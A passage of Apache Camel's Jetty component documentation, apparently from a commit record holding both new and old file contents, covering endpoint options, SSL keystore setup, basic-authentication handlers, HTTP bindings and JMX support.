boolean\n| *transferException* (consumer) | If enabled and an Exchange failed processing on the consumer side, and if the caused Exception was send back serialized in the response as a application\/x-java-serialized-object content type. On the producer side the exception will be deserialized and thrown as is, instead of the HttpOperationFailedException. The caused exception is required to be serialized. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | | Boolean\n| *eagerCheckContentAvailable* (consumer) | Whether to eager check whether the HTTP requests has content if the content-length header is 0 or not present. This can be turned on in case HTTP clients do not send streamed data. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *filterInitParameters* (consumer) | Configuration of the filter init parameters. These parameters will be applied to the filter list before starting the jetty server. | | Map\n| *filters* (consumer) | Allows using a custom filters which is putted into a list and can be find in the Registry. Multiple values can be separated by comma. | | List\n| *handlers* (consumer) | Specifies a comma-delimited set of Handler instances to lookup in your Registry. These handlers are added to the Jetty servlet context (for example, to add security). Important: You can not use different handlers with different Jetty endpoints using the same port number. The handlers is associated to the port number. If you need different handlers, then use different port numbers. | | List\n| *multipartFilter* (consumer) | Allows using a custom multipart filter. Note: setting multipartFilterRef forces the value of enableMultipartFilter to true. | | Filter\n| *optionsEnabled* (consumer) | Specifies whether to enable HTTP OPTIONS for this Servlet consumer. By default OPTIONS is turned off. | false | boolean\n| *traceEnabled* (consumer) | Specifies whether to enable HTTP TRACE for this Servlet consumer. By default TRACE is turned off. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *mapHttpMessageBody* (advanced) | If this option is true then IN exchange Body of the exchange will be mapped to HTTP body. Setting this to false will avoid the HTTP mapping. | true | boolean\n| *mapHttpMessageFormUrlEncoded Body* (advanced) | If this option is true then IN exchange Form Encoded body of the exchange will be mapped to HTTP. Setting this to false will avoid the HTTP Form Encoded body mapping. | true | boolean\n| *mapHttpMessageHeaders* (advanced) | If this option is true then IN exchange Headers of the exchange will be mapped to HTTP headers. Setting this to false will avoid the HTTP Headers mapping. | true | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n|===\n\/\/ endpoint options: END\n\n\n\n\n== Message Headers\n\nCamel uses the same message headers as the xref:http-component.adoc[HTTP]\ncomponent.\nIt also uses (Exchange.HTTP_CHUNKED,CamelHttpChunked)\nheader to turn on or turn off the chuched encoding on the camel-jetty\nconsumer.\n\nCamel also populates *all* request.parameter and request.headers. For\nexample, given a client request with the URL,\n`\\http:\/\/myserver\/myserver?orderid=123`, the exchange will contain a\nheader named `orderid` with the value 123.\n\nYou can get the request.parameter from the\nmessage header not only from Get Method, but also other HTTP method.\n\n== Usage\n\nThe Jetty component supports consumer endpoints.\n\n== Consumer Example\n\nIn this sample we define a route that exposes a HTTP service at\n`\\http:\/\/localhost:8080\/myapp\/myservice`:\n\n*Usage of localhost*\n\nWhen you specify `localhost` in a URL, Camel exposes the endpoint only\non the local TCP\/IP network interface, so it cannot be accessed from\noutside the machine it operates on.\n\nIf you need to expose a Jetty endpoint on a specific network interface,\nthe numerical IP address of this interface should be used as the host.\nIf you need to expose a Jetty endpoint on all network interfaces, the\n`0.0.0.0` address should be used.\n\nTo listen across an entire URI prefix, see\nxref:manual:faq:how-do-i-let-jetty-match-wildcards.adoc[How do I let Jetty match wildcards].\n\nIf you actually want to expose routes by HTTP and already have a\nServlet, you should instead refer to the\nxref:servlet-component.adoc[Servlet Transport].\n\nOur business logic is implemented in the `MyBookService` class, which\naccesses the HTTP request contents and then returns a response. +\n *Note:* The `assert` call appears in this example, because the code is\npart of an unit test.\n\nThe following sample shows a content-based route that routes all\nrequests containing the URI parameter, `one`, to the endpoint,\n`mock:one`, and all others to `mock:other`.\n\nSo if a client sends the HTTP request, `\\http:\/\/serverUri?one=hello`, the\nJetty component will copy the HTTP request parameter, `one` to the\nexchange's `in.header`. We can then use the `simple` language to route\nexchanges that contain this header to a specific endpoint and all others\nto another. If we used a language more powerful than\nxref:languages:simple-language.adoc[Simple] (such as xref:languages:ognl-language.adoc[OGNL])\nwe could also test for the parameter value and do routing based on the\nheader value as well.\n\n== Session Support\n\nThe session support option, `sessionSupport`, can be used to enable a\n`HttpSession` object and access the session object while processing the\nexchange. For example, the following route enables sessions:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0\/myapp\/myservice\/?sessionSupport=true\"\/>\n <processRef ref=\"myCode\"\/>\n<\/route>\n----\n\nThe `myCode` Processor can be instantiated by a\nSpring `bean` element:\n\n[source,xml]\n----\n<bean id=\"myCode\" class=\"com.mycompany.MyCodeProcessor\"\/>\n----\n\nWhere the processor implementation can access the `HttpSession` as\nfollows:\n\n[source,java]\n----\npublic void process(Exchange exchange) throws Exception {\n HttpSession session = exchange.getIn(HttpMessage.class).getRequest().getSession();\n ...\n}\n----\n\n== SSL Support (HTTPS)\n\n[[Jetty-UsingtheJSSEConfigurationUtility]]\nUsing the JSSE Configuration Utility\n\nThe Jetty component supports SSL\/TLS configuration\nthrough the xref:manual::camel-configuration-utilities.adoc[Camel JSSE\nConfiguration Utility]. This utility greatly decreases the amount of\ncomponent specific code you need to write and is configurable at the\nendpoint and component levels. The following examples demonstrate how\nto use the utility with the Jetty component.\n\n[[Jetty-Programmaticconfigurationofthecomponent]]\nProgrammatic configuration of the component\n\n[source,java]\n----\nKeyStoreParameters ksp = new KeyStoreParameters();\nksp.setResource(\"\/users\/home\/server\/keystore.jks\");\nksp.setPassword(\"keystorePassword\");\n\nKeyManagersParameters kmp = new KeyManagersParameters();\nkmp.setKeyStore(ksp);\nkmp.setKeyPassword(\"keyPassword\");\n\nSSLContextParameters scp = new SSLContextParameters();\nscp.setKeyManagers(kmp);\n\nJettyComponent jettyComponent = getContext().getComponent(\"jetty\", JettyComponent.class);\njettyComponent.setSslContextParameters(scp);\n----\n\n[[Jetty-SpringDSLbasedconfigurationofendpoint]]\nSpring DSL based configuration of endpoint\n\n[source,xml]\n----\n <camel:sslContextParameters\n id=\"sslContextParameters\">\n <camel:keyManagers\n keyPassword=\"keyPassword\">\n <camel:keyStore\n resource=\"\/users\/home\/server\/keystore.jks\"\n password=\"keystorePassword\"\/>\n <\/camel:keyManagers>\n <\/camel:sslContextParameters>\n\n <to uri=\"jetty:https:\/\/127.0.0.1\/mail\/?sslContextParameters=#sslContextParameters\"\/>\n\n----\n[[HTTP-Blueprintbasedconfigurationofendpoint]]\nBlueprint based configuration of endpoint\n\nGlobal configuration of sslContextParameters in a dedicated Blueprint XML file\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <sslContextParameters id=\"sslContextParameters\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <keyManagers keyPassword=\"keyPassword\">\n <keyStore resource=\"etc\/keystore.p12\" password=\"keystorePassword\"\/>\n <\/keyManagers>\n <\/sslContextParameters>\n\n <service ref=\"sslContextParameters\" auto-export=\"all-classes\"\/>\n<\/blueprint>\n----\n\nUse of the global configuration in other Blueprint XML files with route definitions\n\n[source,xml]\n----\n...\n<reference id=\"sslContextParameters\" interface=\"org.apache.camel.support.jsse.SSLContextParameters\" ext:proxy-method=\"classes\" \/>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route id=\"WEBISP001\">\n <from uri=\"jetty:https:\/\/0.0.0.0\/path?sslContextParameters=#sslContextParameters\"\/>\n...\n----\n\n[[Jetty-ConfiguringJettyDirectly]]\nConfiguring Jetty Directly\n\nJetty provides SSL support out of the box. To enable Jetty to run in SSL\nmode, simply format the URI with the `\\https:\/\/` prefix---for example:\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice\/\"\/>\n----\n\nJetty also needs to know where to load your keystore from and what\npasswords to use in order to load the correct SSL certificate. Set the\nfollowing JVM System Properties:\n\n* `org.eclipse.jetty.ssl.keystore` specifies the location of the Java\nkeystore file, which contains the Jetty server's own X.509 certificate\nin a _key entry_. A key entry stores the X.509 certificate (effectively,\nthe _public key_) and also its associated private key.\n* `org.eclipse.jetty.ssl.password` the store password, which is required\nto access the keystore file (this is the same password that is supplied\nto the `keystore` command's `-storepass` option).\n* `org.eclipse.jetty.ssl.keypassword` the key password, which is used to\naccess the certificate's key entry in the keystore (this is the same\npassword that is supplied to the `keystore` command's `-keypass`\noption).\n\nFor details of how to configure SSL on a Jetty endpoint, read the\nfollowing documentation at the Jetty Site:\nhttp:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL[http:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL]\n\nSome SSL properties aren't exposed directly by Camel, however Camel does\nexpose the underlying SslSocketConnector, which will allow you to set\nproperties like needClientAuth for mutual authentication requiring a\nclient certificate or wantClientAuth for mutual authentication where a\nclient doesn't need a certificate but can have one.\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectors\">\n <map>\n <entry key=\"8043\">\n <bean class=\"org.eclipse.jetty.server.ssl.SslSelectChannelConnector\">\n <property name=\"password\" value=\"...\"\/>\n <property name=\"keyPassword\" value=\"...\"\/>\n <property name=\"keystore\" value=\"...\"\/>\n <property name=\"needClientAuth\" value=\"...\"\/>\n <property name=\"truststore\" value=\"...\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThe value you use as keys in the above map is the port you configure\nJetty to listen on.\n\n=== Configuring general SSL properties\n\nInstead of a per port number specific SSL socket connector (as shown\nabove) you can now configure general properties which applies for all\nSSL socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectorProperties\">\n <map>\n <entry key=\"password\" value=\"...\"\/>\n <entry key=\"keyPassword\" value=\"...\"\/>\n <entry key=\"keystore\" value=\"...\"\/>\n <entry key=\"needClientAuth\" value=\"...\"\/>\n <entry key=\"truststore\" value=\"...\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== How to obtain reference to the X509Certificate\n\nJetty stores a reference to the certificate in the HttpServletRequest\nwhich you can access from code as follows:\n\n[source,java]\n----\nHttpServletRequest req = exchange.getIn().getBody(HttpServletRequest.class);\nX509Certificate cert = (X509Certificate) req.getAttribute(\"javax.servlet.request.X509Certificate\")\n----\n\n=== Configuring general HTTP properties\n\nInstead of a per port number specific HTTP socket connector (as shown\nabove) you can now configure general properties which applies for all\nHTTP socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectorProperties\">\n <map>\n <entry key=\"acceptors\" value=\"4\"\/>\n <entry key=\"maxIdleTime\" value=\"300000\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== Obtaining X-Forwarded-For header with HttpServletRequest.getRemoteAddr()\n\nIf the HTTP requests are handled by an Apache server and forwarded to\njetty with mod_proxy, the original client IP address is in the\nX-Forwarded-For header and the HttpServletRequest.getRemoteAddr() will\nreturn the address of the Apache proxy.\n\nJetty has a forwarded property which takes the value from\nX-Forwarded-For and places it in the HttpServletRequest remoteAddr\nproperty. This property is not available directly through the endpoint\nconfiguration but it can be easily added using the socketConnectors\nproperty:\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectors\">\n <map>\n <entry key=\"8080\">\n <bean class=\"org.eclipse.jetty.server.nio.SelectChannelConnector\">\n <property name=\"forwarded\" value=\"true\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThis is particularly useful when an existing Apache server handles TLS\nconnections for a domain and proxies them to application servers\ninternally.\n\n== Default behavior for returning HTTP status codes\n\nThe default behavior of HTTP status codes is defined by the\n`org.apache.camel.component.http.DefaultHttpBinding` class, which\nhandles how a response is written and also sets the HTTP status code.\n\nIf the exchange was processed successfully, the 200 HTTP status code is\nreturned. +\n If the exchange failed with an exception, the 500 HTTP status code is\nreturned, and the stacktrace is returned in the body. If you want to\nspecify which HTTP status code to return, set the code in the\n`Exchange.HTTP_RESPONSE_CODE` header of the OUT message.\n\n== Customizing HttpBinding\n\nBy default, Camel uses the\n`org.apache.camel.component.http.DefaultHttpBinding` to handle how a\nresponse is written. If you like, you can customize this behavior either\nby implementing your own `HttpBinding` class or by extending\n`DefaultHttpBinding` and overriding the appropriate methods.\n\nThe following example shows how to customize the `DefaultHttpBinding` in\norder to change how exceptions are returned:\n\nWe can then create an instance of our binding and register it in the\nSpring registry as follows:\n\n[source,xml]\n----\n<bean id=\"mybinding\" class=\"com.mycompany.MyHttpBinding\"\/>\n----\n\nAnd then we can reference this binding when we define the route:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0:8080\/myapp\/myservice?httpBindingRef=mybinding\"\/>\n <to uri=\"bean:doSomething\"\/>\n<\/route>\n----\n\n== Jetty handlers and security configuration\n\nYou can configure a list of Jetty handlers on the endpoint, which can be\nuseful for enabling advanced Jetty security features. These handlers are\nconfigured in Spring XML as follows:\n\n[source,xml]\n----\n<bean id=\"userRealm\" class=\"org.mortbay.jetty.plus.jaas.JAASUserRealm\">\n <property name=\"name\" value=\"tracker-users\"\/>\n <property name=\"loginModuleName\" value=\"ldaploginmodule\"\/>\n<\/bean>\n\n<bean id=\"constraint\" class=\"org.mortbay.jetty.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.mortbay.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.mortbay.jetty.security.SecurityHandler\">\n <property name=\"userRealm\" ref=\"userRealm\"\/>\n <property name=\"constraintMappings\" ref=\"constraintMapping\"\/>\n<\/bean>\n----\n\nYou can configure a list of Jetty handlers as follows:\n\n[source,xml]\n----\n<bean id=\"constraint\" class=\"org.eclipse.jetty.http.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.eclipse.jetty.security.ConstraintSecurityHandler\">\n <property name=\"authenticator\">\n <bean class=\"org.eclipse.jetty.security.authentication.BasicAuthenticator\"\/>\n <\/property>\n <property name=\"constraintMappings\">\n <list>\n <ref bean=\"constraintMapping\"\/>\n <\/list>\n <\/property>\n<\/bean>\n----\n\nYou can then define the endpoint as:\n\n[source,java]\n----\nfrom(\"jetty:http:\/\/0.0.0.0:9080\/myservice?handlers=securityHandler\")\n----\n\nIf you need more handlers, set the `handlers` option equal to a\ncomma-separated list of bean IDs.\n\nBlueprint based definition of basic authentication (based on Jetty 9):\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\"\n xmlns:ext=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-ext\/v1.0.0\">\n\n <bean id=\"constraint\" class=\"org.eclipse.jetty.util.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n <property name=\"roles\">\n <list>\n <value>rolename1<\/value>\n <\/list>\n <\/property>\n <\/bean>\n\n <bean id=\"constraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/path\"\/>\n <\/bean>\n\n <bean id=\"securityHandler\" class=\"org.eclipse.jetty.security.ConstraintSecurityHandler\">\n <property name=\"loginService\">\n <bean class=\"org.eclipse.jetty.security.HashLoginService\">\n <property name=\"config\" value=\"\/opt\/apache-karaf\/etc\/roles.properties\"\/>\n <property name=\"hotReload\" value=\"true\"\/>\n <\/bean>\n <\/property>\n <property name=\"authenticator\">\n <bean class=\"org.eclipse.jetty.security.authentication.BasicAuthenticator\"\/>\n <\/property>\n <property name=\"constraintMappings\">\n <list>\n <ref component-id=\"constraintMapping\"\/>\n <\/list>\n <\/property>\n <\/bean>\n \n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n\n <route>\n <from uri=\"jetty:http:\/\/0.0.0.0\/path?handlers=securityHandler\"\/>\n...\n----\n\nThe roles.properties files contains\n\n[source,text]\n----\nusername1=password1,rolename1\nusername2=password2,rolename1\n----\n\nThis file is located in the etc folder and will be reloaded when changed. The endpoint\n\n[source,text]\n----\nhttp:\/\/0.0.0.0\/path\n----\n\nis now secured with basic authentication, only username1 with password1 and username2 with password2 are able to access the endpoint.\n\n== How to return a custom HTTP 500 reply message\n\nYou may want to return a custom reply message when something goes wrong,\ninstead of the default reply message Camel xref:jetty-component.adoc[Jetty]\nreplies with. +\n You could use a custom `HttpBinding` to be in control of the message\nmapping, but often it may be easier to use Camel's\nException Clause to construct the custom\nreply message. For example as show here, where we return\n`Dude something went wrong` with HTTP error code 500:\n\n== Multi-part Form support\n\nThe camel-jetty component supports multipart form post out of box.\nThe submitted form-data are mapped into the message header. Camel-jetty\ncreates an attachment for each uploaded file. The file name is mapped to\nthe name of the attachment. The content type is set as the content type\nof the attachment file name. You can find the example here.\n\n== Jetty JMX support\n\nThe camel-jetty component supports the enabling of Jetty's JMX\ncapabilities at the component and endpoint level with the endpoint\nconfiguration taking priority. Note that JMX must be enabled within the\nCamel context in order to enable JMX support in this component as the\ncomponent provides Jetty with a reference to the MBeanServer registered\nwith the Camel context. Because the camel-jetty component caches and\nreuses Jetty resources for a given protocol\/host\/port pairing, this\nconfiguration option will only be evaluated during the creation of the\nfirst endpoint to use a protocol\/host\/port pairing. For example, given\ntwo routes created from the following XML fragments, JMX support would\nremain enabled for all endpoints listening on \"https:\/\/0.0.0.0\".\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice1\/?enableJmx=true\"\/>\n----\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice2\/?enableJmx=false\"\/>\n----\n\nThe camel-jetty component also provides for direct configuration of the\nJetty MBeanContainer. Jetty creates MBean names dynamically. If you are\nrunning another instance of Jetty outside of the Camel context and\nsharing the same MBeanServer between the instances, you can provide both\ninstances with a reference to the same MBeanContainer in order to avoid\nname collisions when registering Jetty MBeans.\n\ninclude::camel-spring-boot::page$jetty-starter.adoc[]\n","old_contents":"[[jetty-component]]\n= Jetty Component\n:page-source: components\/camel-jetty\/src\/main\/docs\/jetty-component.adoc\n\n*Since Camel 1.2*\n\n\/\/ HEADER START\n*Only consumer is supported*\n\/\/ HEADER END\n\nThe Jetty component provides HTTP-based endpoints\nfor consuming and producing HTTP requests. That is, the Jetty component\nbehaves as a simple Web server.\n\n*Stream*\n\nThe `assert` call appears in this example, because the code is part of\nan unit test.Jetty is stream based, which means the input it receives is\nsubmitted to Camel as a stream. That means you will only be able to read\nthe content of the stream *once*. +\nIf you find a situation where the message body appears to be empty or\nyou need to access the Exchange.HTTP_RESPONSE_CODE data multiple times\n(e.g.: doing multicasting, or redelivery error handling), you should use\nStream caching or convert the message body to\na `String` which is safe to be re-read multiple times.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-jetty<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source,text]\n----\njetty:http:\/\/hostname[:port][\/resourceUri][?options]\n----\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\n\n\n\n\/\/ component options: START\nThe Jetty component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *continuationTimeout* (consumer) | Allows to set a timeout in millis when using Jetty as consumer (server). By default Jetty uses 30000. You can use a value of = 0 to never expire. If a timeout occurs then the request will be expired and Jetty will return back a http error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. | false | boolean\n| *maxThreads* (consumer) | To set a value for maximum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *minThreads* (consumer) | To set a value for minimum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *requestBufferSize* (consumer) | Allows to configure a custom value of the request buffer size on the Jetty connectors. | | Integer\n| *requestHeaderSize* (consumer) | Allows to configure a custom value of the request header size on the Jetty connectors. | | Integer\n| *responseBufferSize* (consumer) | Allows to configure a custom value of the response buffer size on the Jetty connectors. | | Integer\n| *responseHeaderSize* (consumer) | Allows to configure a custom value of the response header size on the Jetty connectors. | | Integer\n| *sendServerVersion* (consumer) | If the option is true, jetty will send the server header with the jetty version information to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | true | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | true | boolean\n| *useXForwardedForHeader* (consumer) | To use the X-Forwarded-For header in HttpServletRequest.getRemoteAddr. | false | boolean\n| *threadPool* (consumer) | To use a custom thread pool for the server. This option should only be used in special circumstances. | | ThreadPool\n| *allowJavaSerializedObject* (advanced) | Whether to allow java serialization when a request uses context-type=application\/x-java-serialized-object. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *errorHandler* (advanced) | This option is used to set the ErrorHandler that Jetty server uses. | | ErrorHandler\n| *httpBinding* (advanced) | Not to be used - use JettyHttpBinding instead. | | HttpBinding\n| *httpConfiguration* (advanced) | Jetty component does not use HttpConfiguration. | | HttpConfiguration\n| *jettyHttpBinding* (advanced) | To use a custom org.apache.camel.component.jetty.JettyHttpBinding, which are used to customize how a response should be written for the producer. | | JettyHttpBinding\n| *mbContainer* (advanced) | To use a existing configured org.eclipse.jetty.jmx.MBeanContainer if JMX is enabled that Jetty uses for registering mbeans. | | MBeanContainer\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *proxyHost* (proxy) | To use a http proxy to configure the hostname. | | String\n| *proxyPort* (proxy) | To use a http proxy to configure the port number. | | Integer\n| *keystore* (security) | Specifies the location of the Java keystore file, which contains the Jetty server's own X.509 certificate in a key entry. | | String\n| *socketConnectorProperties* (security) | A map which contains general HTTP connector properties. Uses the same principle as sslSocketConnectorProperties. | | Map\n| *socketConnectors* (security) | A map which contains per port number specific HTTP connectors. Uses the same principle as sslSocketConnectors. | | Map\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n| *sslKeyPassword* (security) | The key password, which is used to access the certificate's key entry in the keystore (this is the same password that is supplied to the keystore command's -keypass option). | | String\n| *sslPassword* (security) | The ssl password, which is required to access the keystore file (this is the same password that is supplied to the keystore command's -storepass option). | | String\n| *sslSocketConnectorProperties* (security) | A map which contains general SSL connector properties. | | Map\n| *sslSocketConnectors* (security) | A map which contains per port number specific SSL connectors. | | Map\n| *useGlobalSslContextParameters* (security) | Enable usage of global SSL context parameters | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe Jetty endpoint is configured using URI syntax:\n\n----\njetty:httpUri\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *httpUri* | *Required* The url of the HTTP endpoint to call. | | URI\n|===\n\n\n=== Query Parameters (34 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *disableStreamCache* (common) | Determines whether or not the raw input stream from Servlet is cached or not (Camel will read the stream into a in memory\/overflow to file, Stream caching) cache. By default Camel will cache the Servlet input stream to support reading it multiple times to ensure it Camel can retrieve all data from the stream. However you can set this option to true when you for example need to access the raw stream, such as streaming it directly to a file or other persistent store. DefaultHttpBinding will copy the request input stream into a stream cache and put it into message body if this option is false to support reading the stream multiple times. If you use Servlet to bridge\/proxy an endpoint then consider enabling this option to improve performance, in case you do not need to read the message payload multiple times. The http producer will by default cache the response body stream. If setting this option to true, then the producers will not cache the response body stream but use the response stream as-is as the message body. | false | boolean\n| *headerFilterStrategy* (common) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *httpBinding* (common) | To use a custom HttpBinding to control the mapping between Camel message and HttpClient. | | HttpBinding\n| *async* (consumer) | Configure the consumer to work in async mode | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *chunked* (consumer) | If this option is false the Servlet will disable the HTTP streaming and set the content-length header on the response | true | boolean\n| *continuationTimeout* (consumer) | Allows to set a timeout in millis when using Jetty as consumer (server). By default Jetty uses 30000. You can use a value of = 0 to never expire. If a timeout occurs then the request will be expired and Jetty will return back a http error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableCORS* (consumer) | If the option is true, Jetty server will setup the CrossOriginFilter which supports the CORS out of box. | false | boolean\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. See Jetty JMX support for more details. | false | boolean\n| *enableMultipartFilter* (consumer) | Whether org.apache.camel.component.jetty.MultiPartFilter is enabled or not. You should set this value to false when bridging endpoints, to ensure multipart requests is proxied\/bridged as well. | false | boolean\n| *httpMethodRestrict* (consumer) | Used to only allow consuming if the HttpMethod matches, such as GET\/POST\/PUT etc. Multiple methods can be specified separated by comma. | | String\n| *matchOnUriPrefix* (consumer) | Whether or not the consumer should try to find a target consumer by matching the URI prefix if no exact match is found. | false | boolean\n| *muteException* (consumer) | If enabled and an Exchange failed processing on the consumer side the response's body won't contain the exception's stack trace. | false | boolean\n| *responseBufferSize* (consumer) | To use a custom buffer size on the javax.servlet.ServletResponse. | | Integer\n| *sendDateHeader* (consumer) | If the option is true, jetty server will send the date header to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | false | boolean\n| *sendServerVersion* (consumer) | If the option is true, jetty will send the server header with the jetty version information to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | true | boolean\n| *sessionSupport* (consumer) | Specifies whether to enable the session manager on the server side of Jetty. | false | boolean\n| *transferException* (consumer) | If enabled and an Exchange failed processing on the consumer side, and if the caused Exception was send back serialized in the response as a application\/x-java-serialized-object content type. On the producer side the exception will be deserialized and thrown as is, instead of the HttpOperationFailedException. The caused exception is required to be serialized. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | | Boolean\n| *eagerCheckContentAvailable* (consumer) | Whether to eager check whether the HTTP requests has content if the content-length header is 0 or not present. This can be turned on in case HTTP clients do not send streamed data. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| 